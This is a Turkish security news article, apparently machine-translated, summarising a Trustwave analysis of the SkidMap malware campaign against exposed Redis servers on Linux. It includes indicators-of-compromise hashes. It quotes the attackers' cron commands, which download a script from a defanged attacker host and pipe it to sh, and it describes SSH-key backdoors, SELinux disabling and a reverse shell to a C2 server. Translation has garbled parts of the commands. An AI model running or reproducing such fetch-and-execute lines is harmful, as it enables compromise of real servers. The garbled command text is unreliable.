Son raporlara göre, savunmasız Redis sistemlerinden yararlanmak için “SkidMap” adlı kötü amaçlı yazılımı kullanan tehdit aktörlerinin örnekleri olmuştur.
SkidMap’in önceki sürümleri, gizlice kripto para madenciliği yapmak ve kötü amaçlı çekirdek modülleri yükleyerek yanlış ağ trafiği ve CPU kullanımı oluşturmak için kullanılıyordu.
Ancak, bu kötü amaçlı yazılımın son sürümü oldukça karmaşık görünüyor ve yalnızca açık Redis örneklerini hedefliyor.
Linux’a Saldıran SkidMap Kötü Amaçlı Yazılımı
SkidMap’teki yeni varyantın daha ayrıntılı analizi, yürütüldüğü işletim sistemine uyarlama ve virüslü sistemdeki Linux Dağıtım mimarisine dayalı olarak indirilecek ikili dosyayı seçme gibi etkinlikleri ortaya çıkardı.
Başlangıçta, tehdit aktörü, base64 dizesini kullanan bir değişkenle cron görevlerini ayarlamak için Redis örneklerini açmak üzere oturum açmaya çalışır. Bu dizeler, bir “çalıştırmak için iki cron görevinden oluşur.wget” (wget hxxp://z[.]shavsl[.]com/b -qO – | ş) ve “kıvırmak” (kıvrılma -fsSL hxxp://z[.]shavsl[.]com/b | sh) ‘b’, ‘c’ ve ‘f’ damlalık betiklerini indirmek için 10 dakikalık aralıklarla yürütülen komut.
Damlalık betikleri, yürütülebilir bir ikili dosyayı (ELF) ‘gif’ (önceki sürüm ‘jpeg’ kullanıyordu) trojan dosyası olan ‘/var/lib/’ dizinine indirmek için kullanılır.
Bu truva atı başlangıçta ‘/root/.ssh/authoried_keys’ ve ‘/root/.ssh/authoried_keys2’ standart konumlarına bazı SSH anahtarları ekler. Bu, tehdit aktörlerinin sisteme giriş yapması için bir arka kapı bırakmak amacıyla yapılır.
Diğer eylemler, erişim kontrolü güvenlik politikalarını uygulamak ve kalıcı olarak devre dışı bırakmak için kullanılan SElinux (Security-Enhanced Linux) modülünün durumunu kontrol etmeyi içerir. Bundan sonra, ana işletim sisteminde belirli değişiklikler yapılarak trojan kalıcı hale getirilir.
Trojan, TCP/8443 portu üzerinden saldırganların C2 sunucusuna saat başı ters bir kabuk oluşturur. GIF ikili dosyasının Alibaba, Anolis, openEuler, EulerOS, Steam, CentOS, RedHat ve Rock gibi linux dağıtımlarını hedeflediği bulundu.
Tehdit aktörlerinin taktikleri, yöntemleri, kaynak kodu ve diğer analizleri hakkında eksiksiz bir açıklama sağlayan Trustwave tarafından eksiksiz bir rapor yayınlandı.
Uzlaşma Göstergeleri
| Dosya adı | Hash Türü | Hash’ler |
| b,c,f | MD5 | 000916c60b2ab828ba8cea914c308999 |
| SHA1 | 9970809e1dedce286888f7d25790b4dcca1e704b | |
| SHA256 | 969e10e4a61cc5f80c414259c4d90c74bcf43ccd5678910700bdc14cd60f9725 | |
| gif | MD5 | e23b3c7eb5d68e3cd43e9e61a3055fe8 |
| SHA1 | 940f45f8a5dfb16281a35cd8303cd98c1ab1fabd | |
| SHA256 | f77c4b704b20affdd737af44cabd3d7b56d8987924f2179137bbeef0e4be0367 | |
| jpeg | MD5 | e23b3c7eb5d68e3cd43e9e61a3055fe8 |
| SHA1 | 940f45f8a5dfb16281a35cd8303cd98c1ab1fabd | |
| SHA256 | f77c4b704b20affdd737af44cabd3d7b56d8987924f2179137bbeef0e4be0367 | |
| .madenci | MD5 | 44de739950eb4a8a3552b4e1987e8ec2 |
| SHA1 | 0ae049aab363fb8d2e164150dffbafd332725e00 | |
| SHA256 | 9b81bad2111312e669697b69b9f121a1f9519da61cd5d37689e38381c1ffad28 |
Bizi GoogleNews, Linkedin üzerinden takip ederek en son Siber Güvenlik Haberlerinden haberdar olun, twitterve Facebook.